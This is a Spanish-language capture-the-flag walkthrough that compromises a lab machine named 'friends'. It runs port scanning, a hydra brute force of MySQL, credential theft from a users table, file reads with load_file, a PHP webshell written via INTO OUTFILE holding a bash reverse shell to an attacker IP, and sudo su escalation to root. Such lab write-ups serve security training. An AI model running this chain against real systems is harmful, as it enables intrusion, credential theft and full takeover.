Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.112❯ nmap -sCV -p 22,80,3306 -oN 02-targeted.txt 192.168.1.112
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 14:46 -03
Nmap scan report for 192.168.1.112
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Friends
3306/tcp open mysql MariaDB 5.5.5-10.5.19
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsCompression, ODBCClient, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsTransactions, InteractiveClient, IgnoreSigpipes, FoundRows, Speaks41ProtocolNew, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: A^:E+DXk4][1#WpLiO/<
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 secondsEl sitio muestra una imagen de Beavis y Butt-Head, así que usamos esos nombres como usuarios para hacer fuerza bruta contra MySQL (3306):
❯ hydra -L users.txt -P ~/Documentos/wordlists/rockyou.txt 192.168.1.112 mysql -t 64
...
[3306][mysql] host: 192.168.1.112 login: beavis password: rocknroll
...Nos conectamos y exploramos la base de datos friends, obteniendo credenciales de la tabla users:
❯ mariadb -h 192.168.1.112 -u beavis -p --ssl-verify-server-cert=OFF
Enter password: rocknroll
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| friends |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
MariaDB [(none)]> use fiends;
MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users |
+-------------------+
MariaDB [friends]> select * from users;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| 1 | beavis | b3@v1$123 |
| 2 | butthead | BuTTh3@D! |
+------+----------+-----------+Con la función load_file leemos el index.php y, en un comentario, descubrimos una ruta oculta (/M3t4LL1c@):
MariaDB [(none)]> select load_file('/var/www/html/index.php');
...
/*
print "For more Rock & Roll visit: /M3t4LL1c@ ";
*/
...Como MySQL puede escribir archivos, usamos INTO OUTFILE para colocar una webshell PHP en esa ruta:
MariaDB [(none)]> select "<?php shell_exec(\"bash -c 'bash -i >& /dev/tcp/192.168.1.25/1234 0>&1'\"); ?>" into outfile "/var/www/html/M3t4LL1c@/pwned.php";Accedemos a la webshell para obtener una reverse shell como www-data:
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.112:50400.
bash: cannot set terminal process group (449): Inappropriate ioctl for device
bash: no job control in this shell
www-data@friends:/var/www/html/M3t4LL1c@$Reutilizamos las credenciales de la base de datos para movernos al usuario butthead:
www-data@friends:/home$ su butthead
Password: BuTTh3@D!Revisamos sus permisos sudo:
butthead@friends:~$ sudo -l
[sudo] password for butthead: BuTTh3@D!
Matching Defaults entries for butthead on friends:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User butthead may run the following commands on friends:
(root) PASSWD: /usr/bin/suPodemos ejecutar su como root, lo que nos da directamente una shell de root:
butthead@friends:~$ sudo su
root@friends:/home/butthead#Obtenemos las flags y fin.